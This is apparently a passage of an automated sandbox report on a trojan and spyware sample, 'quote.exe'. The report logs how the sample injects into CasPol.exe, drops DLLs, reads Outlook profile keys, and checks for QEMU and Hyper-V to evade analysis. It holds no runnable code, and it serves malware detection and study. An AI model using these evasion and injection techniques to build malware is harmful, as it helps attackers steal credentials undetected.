            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C89D4C0_2_02C89D4C
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C809400_2_02C80940
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C815540_2_02C81554
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80D540_2_02C80D54
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C811570_2_02C81157
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C815050_2_02C81505
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C805190_2_02C80519
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C879280_2_02C87928
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8012F0_2_02C8012F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8213A0_2_02C8213A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80D350_2_02C80D35
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C865350_2_02C86535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D72A1603_2_1D72A160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D7298903_2_1D729890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D7295483_2_1D729548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1FBCEF703_2_1FBCEF70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1FBC3D883_2_1FBC3D88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1FBC30383_2_1FBC3038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1FBC00403_2_1FBC0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1FBC8A093_2_1FBC8A09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_2089693C3_2_2089693C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20895D683_2_20895D68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208900403_2_20890040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208969303_2_20896930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20896E5E3_2_20896E5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20895D623_2_20895D62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208B00403_2_208B0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208B32F03_2_208B32F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208BE4903_2_208BE490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208B1D003_2_208B1D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208B3F043_2_208B3F04
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208B7F583_2_208B7F58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208BD1203_2_208BD120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208BD4BF3_2_208BD4BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208B87A03_2_208B87A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_208B874E3_2_208B874E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 1D72D148 appears 53 times
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C92AB2 NtProtectVirtualMemory,0_2_02C92AB2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C938C0 NtResumeThread,0_2_02C938C0
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C911B1 NtAllocateVirtualMemory,0_2_02C911B1
            Source: lang-1038.dll.0.drStatic PE information: No import functions for PE file found
            Source: C:\Users\user\Desktop\quote.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: quote.exeStatic PE information: invalid certificate
            Source: quote.exeVirustotal: Detection: 8%
            Source: C:\Users\user\Desktop\quote.exeFile read: C:\Users\user\Desktop\quote.exeJump to behavior
            Source: quote.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\quote.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\quote.exe "C:\Users\user\Desktop\quote.exe"
            Source: C:\Users\user\Desktop\quote.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\quote.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\quote.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\quote.exe" Jump to behavior
            Source: C:\Users\user\Desktop\quote.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\quote.exeFile created: C:\Users\user\AppData\Local\Temp\nsn4C59.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/5@2/2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
            Source: C:\Users\user\Desktop\quote.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_00404858 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8920:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8920:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: quote.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.1203658482.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C85650 push edi; retf 0_2_02C85F48
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C85E74 push edi; retf 0_2_02C85F48
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C838DB pushfd ; retf 0_2_02C83A20
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8E0E1 push FFFFFFA2h; ret 0_2_02C8E0F2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C89088 push ebx; retf 0_2_02C89089
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C838AD pushfd ; retf 0_2_02C83A20
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C83810 pushfd ; retf 0_2_02C83A20
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C87D9A pushad ; ret 0_2_02C87DAB
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C88549 pushfd ; retf 0_2_02C8856A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8395E pushfd ; retf 0_2_02C83A20
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C88562 pushfd ; retf 0_2_02C8856A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C86105 push 85CC5A93h; iretd 0_2_02C8610A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8612F pushad ; iretd 0_2_02C86130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1FBC1972 push 8B000005h; retf 3_2_1FBC1977
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1FBC270A push esp; retf 3_2_1FBC2711
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_6F491B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F491B5F
            Source: C:\Users\user\Desktop\quote.exeFile created: C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\quote.exeFile created: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195\lang-1038.dllJump to dropped file
            Source: C:\Users\user\Desktop\quote.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\quote.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\quote.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: quote.exe, 00000000.00000002.1327571703.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: quote.exe, 00000000.00000002.1327571703.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: quote.exe, 00000000.00000002.1325762856.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
            Source: quote.exe, 00000000.00000002.1325762856.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4436Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\quote.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195\lang-1038.dllJump to dropped file
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80EDF rdtsc 0_2_02C80EDF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9516Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1D720C40 sldt word ptr [eax]3_2_1D720C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_0040676F FindFirstFileW,FindClose,0_2_0040676F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B23
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\quote.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\quote.exeAPI call chain: ExitProcess graph end nodegraph_0-16547
            Source: C:\Users\user\Desktop\quote.exeAPI call chain: ExitProcess graph end nodegraph_0-16700
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\quote.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000003.00000002.6058869094.000000000159B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6062301272.00000000015E7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6063310833.0000000001602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: quote.exe, 00000000.00000002.1327571703.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: quote.exe, 00000000.00000002.1325762856.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
